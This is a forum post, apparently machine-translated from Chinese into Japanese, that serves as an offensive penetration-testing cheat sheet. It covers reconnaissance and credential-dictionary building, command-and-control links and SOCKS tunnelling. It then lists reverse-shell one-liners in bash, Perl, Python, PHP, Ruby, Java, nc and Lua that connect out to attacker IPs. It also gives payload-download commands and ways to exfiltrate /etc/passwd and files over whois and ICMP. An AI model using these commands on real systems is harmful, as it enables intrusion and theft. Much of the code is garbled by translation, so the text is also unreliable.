Jump to content

情報収集

オープンソースインテリジェンス情報コレクション(OSINT)

github

github_nuggests(githubに漏れた敏感な情報を自動的にクロールする):https://github.com/az0ne/github_nuggests

GSIL(15分以内に)ほぼリアルタイムでGitHubでリークされた情報を発見することができます:https://GITHUB.COM/FEEICN/GSIL

X-Patrol(Xiaomiチームの):3359GITHUB.com/misecurity/x-patrol

whois query/register counter-ceck/emailカウンターチェック/関連資産

Webmaster's Home :http://whois.chinaz.com/?domainname=target.comws=

ラブステーション:https://whois.aizhan.com/target.com/

Weibu Online :https://X.Threatbook.cn/

IP Counter-Check:https://dns.aizhan.com/

Tianyancha :https://www.tianyancha.com/

Tiger Mom Check :http://ww.whomx.com/

歴史的脆弱性クエリ:オンラインクエリ:http://wy.zone.ci/

自己構築:https://github.com/hanc00l/wooyun_publi/

Googleハッキング

エンタープライズパスワード辞書を作成

辞書リスト

PasswordList:3359Github.com/lavalamp-/password-lists

Pigman Dictionary :https://pan.baidu.com/s/1dfjyedzblasting_dictionary(弱いパスワード、一般的に使用されるパスワード、ディレクトリブラスト、データベースブラスト、編集者ブラスト、背景爆破などを含むさまざまな辞書を共有および収集します。

特定のメーカーの場合、メーカー関連のドメイン名の辞書の構築に焦点を当てています

['%PWD%123'、 '%user%123'、 '%user%521'、 '%user%2017'、 '%pwd%321'、 '%pwd%521'、 '%user%321'、 '%pwd%123!'、 '%pwd%1 23!@# '、'%PWD%1234 '、'%user%2016 '、'%user%123 $%^'、'%user%123!@# '、'%pwd%2016 '、'%pwd%2017 '、'%pwd%1! '、'%pwd%2 @'、'%PWD%3# '、'%PWD%123#@! '、'%PWD%12345 '、'%PWD%123 $%^'、'%PWD% 56 '、'%user%123#@! '、'%user%

パスワード生成

GenPass(漢字を備えた弱いパスワードジェネレーター:33https://GITHUB.COM/RICTERZ/GENPASS/

Passmaker(ルールをカスタマイズできるパスワード辞書ジェネレーター):https://github.com/bit4woo/passmaker

pydictor(強力なパスワードジェネレーター):https://github.com/landgrey/pydictor

メーリングリストGet

TheHarvester:https://github.com/laramies/theharvester

メールアドレスを取得し、アドレス帳をエクスポートします

LinkedInt :https://github.com/mdsecactivebreach/linkedint

Mailet:https://github.com/ridter/mailget

リークパスワードクエリ

ghostproject:3359ghostproject.fr/

pwndb:https://pwndb2am4tzkvold.onion.to/

エンタープライズ外の関連情報のコレクション

サブドメイン名取得

レイヤーサブドメイン掘削機4.2記念バージョン

subdomainsbrute:https://github.com/lijiejie/subdomainsbrute

wydomain:https://github.com/ring04h/wydomain

sublist3r:https://github.com/aboul3la/sublist3r

site:target.com:https://www.google.com

GitHubコードリポジトリ

パケットキャプチャ分析リクエストリクターズ返品値(ジャンプ/ファイルアップロード/APP/APIインターフェイスなど)

Webmasterヘルパーリンクおよびその他のオンライン検索Webサイト

ドメイン送信の脆弱性

Linux

dig @ns.example.com example=.com axfr

Windows

nslookup -type=ns xxx.yyy.cn #queryドメイン名を解決するDNSサーバー

nslookup #enter nslookupインタラクティブモード

サーバーdns.domian.com #pecify dns server

LS XXX.YYY.CN #LISTドメイン情報

getDomainsByssl.py :3359Note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b1222222222222222222222222222222222222222222222222222222

censys.io証明書:https://censys.io/certificates?q=target.com

CRT.SH証明書クエリ3:3359CRT.SH/?Q=%25.Target.com

Shadon :https://www.shodan.io/

Zoomeye :https://www.zoomeyee.org/

FOFA :https://FOFA.SO/

Censys:https://Censys.io/

dnsdb.io :3359dnsdb.io/zh-cn/search?q=target.com

api.hackertarget.com :3358api.hackertarget.com/reversedns/?q=target.com

community.riskiq.com :3359Community.riskiq.com/search/target.com

subdomain3 :https://github.com/yanxiu0614/subdomain3

Fuzzdomain :https://github.com/chora10/fuzzdomain

dnsdumpster.com :3359dnsdumpster.com/

phpinfo.me :3359phpinfo.me/domain/

DNS Open Data Interface :https://DNS.BUFFEROVER.RUN/DNS?Q=BAIDU.com

イントラネット

を入力します

エンタープライズの弱いアカウントの抜け穴に基づいて

VPN(電子メール、パスワードブラスト、ソーシャルワーカーなどを介してVPNを取得)

エンタープライズ関連の運用およびメンテナンスシステム(Zabbixなど)

システムの脆弱性に基づいて入力

Metasploit(脆弱性エクスプロイトフレームワーク):3359Github.com/rapid7/Metasploit-framework

スクリプトを悪用します

ウェブサイトのアプリケーションの普及

SQL注入

クロスサイトスクリプト(XSS)

クロスサイトリクエスト偽造(CSRF)

ssrf(ssrf_proxy)

機能/ビジネスロジックの脆弱性

その他の脆弱性など

CMSコンテンツ管理システムの脆弱性

エンタープライズセルフビルドエージェント

ワイヤレスWi-Fiアクセス

シーン攻撃

コマンドとコントロール

ICMP :3359Pentestlab.blog/2017/07/28/Command-and-Control-icmp/

DNS :https://Pentestlab.blog/2017/09/06/command-and-control-dns/

Dropbox :https://Pentestlab.blog/2017/08/29/command-and-control-dropbox/

gmail :https://pentestlab.blog/2017/08/03/command-and-control-gmail/

Telegram :http://drops.xmd5.com/static/drops/tips-16142.html

Twitter :https://Pentestlab.blog/2017/09/26/command-and-control-twitter/

ウェブサイトキーワード:https://Pentestlab.blog/2017/09/14/command-and-control-website-keyword/

Powershell :https://Pentestlab.blog/2017/08/19/command-and-control-powershell/

Windows com :https://pentestlab.blog/2017/09/01/command-and-control-windows-com/

webdav :https://pentestlab.blog/2017/09/12/command-and-control-webdav/

Office 365 :https://www.anquanke.com/post/id/86974

https :https://pentestlab.blog/2017/10/04/command-and-control-https/

Kernel :https://Pentestlab.blog/2017/10/02/command-and-control-kernel/

ウェブサイト:https://Pentestlab.blog/2017/11/14/command-and-control-website/

WMI :https://Pentestlab.blog/2017/11/20/command-and-control-wmi/

WebSocket :https://Pentestlab.blog/2017/12/06/command-and-control-websocket/

画像:https://Pentestlab.blog/2018/01/02/command-and-control-images/

Webインターフェイス:https://Pentestlab.blog/2018/01/03/command-and-control-web-interface/

JavaScript :https://Pentestlab.blog/2018/01/08/command-and-control-javascript/

.

フロンティング

ドメインフロンティング

tor_fronting。

エージェント

VPN

http :http://cn-proxy.com/

トル

インターネットクロスボーダーアプリケーション

イントラネットクロスボーダー転送

NCポート転送

LCXポート転送

NP

プロキシスクリプトTunna

reduh

.

イントラネットクロスボーダープロキシ浸透

ew

フォワードソックスV5サーバー:

./ew -s ssocksd -l 1080

リバウンドソックスV5サーバー:A)最初に、パブリックネットワークIPを使用してホストAで次のコマンドを実行します。

$ ./ew -s rcsocks -l 1080 -e 8888

b)ターゲットホストBで靴下V5サービスを開始し、パブリックホストのポート8888にバウンスします

$ ./ew -s rssocks -d 1.1.1.1 -e 8888

マルチレベルのカスケード

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999

$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

LCX_TRANの使用

$ ./EW -S SSOCKSD -L 9999

$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

LCX_LISTENとLCX_SLAVEの使用

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./EW -S SSOCKSD -L 9999

$ ./EW -S LCX_SLAVE -D 127.0.0.1 -E 8888 -F 127.0.0.1 -G 9999

参照のために「3レベルのカスケード」ローカルソックステストケース

$ ./ew -s rcsocks -l 1080 -e 8888

$ ./EW -S LCX_SLAVE -D 127.0.0.1 -E 8888 -F 127.0.0.1 -G 9999

$ ./ew -s lcx_listen -l 9999 -e 7777

$ ./ew -s rssocks -d 127.0.0.1 -e 7777

シロアリ

use :3https://rootkiter.com/termite/readme.txtの手順

プロキシスクリプト

Regeorg :3359github.com/sensepost/regeorg

シェルリバウンド

bash

bash -i /dev/tcp/10.0.0.1/8080 01

Perl

perl -e '使用socket; $ i='10 .0.0.1 '; $ p=1234; socket(s、pf_inet、sock_stream、getprotobyname(' tcp ')); if(connect(s、 sockaddr_in($ p、inet_aton($ i)))){open(stdin、 's'); open(stdout、 's'); open(stderr、 's'); exec( '/bin/sh -私');};'

Python

python -c 'インポートソケット、サブプロセス、OS; s=socket.socket.socket(socket.af_inet、socket.sock_stream); s.connect(( '10.0.0.1'、1234)); o s.dup2(s.fileno()、0); os.dup2(s.fileno()、1); os.dup2(s.fileno()、2); p=subprocess.call(['/bin/sh' '、' -i '];'

Php

php -r '$ sock=fsocopen('10 .0.0.1'、1234); exec( '/bin/sh -i 3 3 23'); '

ルビー

ruby -rsocket -e'f=tcpsocket.open('10 .0.0.1 '、1234).to_i; exec sprintf('/bin/sh -i%d%d 2%d '、f、f、f)'

Java

r=runtime.getRuntime()

p=r.exec(['/bin/bash'、 '-c'、 'exec 5/dev/tcp/10.0.0.1/2002; cat 5 | while read line; do \ $ line 25 5; done'] string []))

p.waitfor()

NC

#use-e

NC -E /BIN /SH 223.8.200.234 1234

#not used-e

mknod /tmp /backpipe p

/bin/sh 0/tmp/backpipe | NC AttacherIPリスニングポート1/TMP/バックパイプ

ルア

lua -e 'require(' socket '); require(' os '); t=socket.tcp(); t:connect(' 202.103.243.122 '、' 1234 '); os.execute('/bin/sh -i 3 3 23 ');'

イントラネットファイルの転送およびダウンロード

WPUT

wput dir_name ftp://linuxpig:123456@host.com/

wget

wget http://site.com/1.rar -o 1.rar

ARIAC2(インストールする必要があります)

aria2c -o owncloud.zip 3https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2

Powershell

$ p=new-Object System.net.webclient

$ P.DownLoadFile( 'http://Domain/file'、 'c:%homepath%file')

VBSスクリプト

args=wscript.argumentsを設定します

url='http://domain/file'

dim xhttp: set xhttp=createObject( 'microsoft.xmlhttp')

dim bstrm: set bstrm=createObject( 'adodb.stream')

xhttp.open 'get'、url、false

xhttp.send

BSTRMで

.type=1 '。開ける。xhttp.responsebodyを作成します

.savetofile 'c: \%homepath%\ file'、2 '

で終わります

実行:cscript test.vbs

Perl

#!/usr/bin/perl

lwp:simpleを使用します。

getStore( 'http://domain/file'、 'file');

実行:perl test.pl

Python

#!/usr/bin/python

urllib2をインポートします

u=urllib2.urlopen( 'http://domain/file')

localfile=open( 'local_file'、 'w')

localfile.write(u.read())

localfile.close()

実行:python test.py

ルビー

#!/usr/bin/ruby

「net/http」が必要です

net:http.start( 'www.domain.com'){| http |

r=http.get( '/file')

open( 'Save_Location'、 'wb'){| file |

file.write(r.body)

}

}

実行:Ruby test.rb

Php

?php

$ url='http://ww.example.com/file';

$ path='/path/to/file';

$ ch=curl_init($ url);

curl_setopt($ ch、curlopt_returntransfer、true);

$ data=curl_exec($ ch);

curl_close($ ch);

file_put_contents($ path、$ data);

実行:php test.php

ncattacker

CATファイル| NC -L 1234

ターゲット

NC HOST_IP 1234ファイル

FTP

FTP 127.0.0.1ユーザー名パスワードファイル終了を取得します

TFTP

TFTP -IホストGET C:%HOMEPATH%FILE LOCATION_OF_FILE_ON_TFTP_SERVER

bitsadmin

bitsadmin /転送n http://domain /file c:%homepath%file

ウィンドウファイル共有

正味使用x: \ 127.0.0.1 \ share /user:example.comuserid mypassword

SCPローカルからリモート

SCPファイルuser@host.com:/TMP

リモートからローカル

scp user@host.com:/TMPファイル

rsyncリモートrsyncサーバーからローカルマシンにファイルをコピーする

rsync -av root@192.168.78.192:3360ww /databack

ローカルマシンからリモートRSYNCサーバーにファイルをコピーする

rsync -av /databack root@192.168.78.192:3360www

certutil.exe

certutil.exe -urlcache -split -f http://site.com/file

コピー

コピー\\ ip \ sharename \ file.exe file.exe

WHOISレシーバーホストB:

NC -VLNP 1337 | SED 's///g' | base64 -d

送信者ホストA:

whois -h host_ip -p 1337 `cat /etc /passwd | base64`

WHOIS + TARFIRST:

ncat -k -l -p 4444 |ティーファイル。b64#teeファイルに、それが確実に持っていることを確認できるようにする

TAR CZF - /TMP /* | base64 | xargs -iビットタイムアウト0.03 whois -h host_ip -p 4444ビット

ついに

cat files.b64 | tr -d '\ r \ n' | base64 -d | tar zxv#ファイルを出力します

Ping送信終了:

xxd -p -c 4 Secret.txt |読み取りライン。 ping -c 1 -p $ line ipを行います。終わり

受信者ping_receiver.py:

sysをインポートします

try:

scapy.allからimport *

:を除く

印刷( 'SCAPYが見つかりません、SCAPY: PIPインストールSCAPY'をインストールしてください ')

sys.exit(0)

def process_packet(pkt):

pkt.haslayer(ICMP):の場合

pkt [icmp] .type==8:の場合

data=pkt [icmp] .load [-4:]

print(f '{data.decode(' utf-8 ')}'、flush=true、end=''、sep='')

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...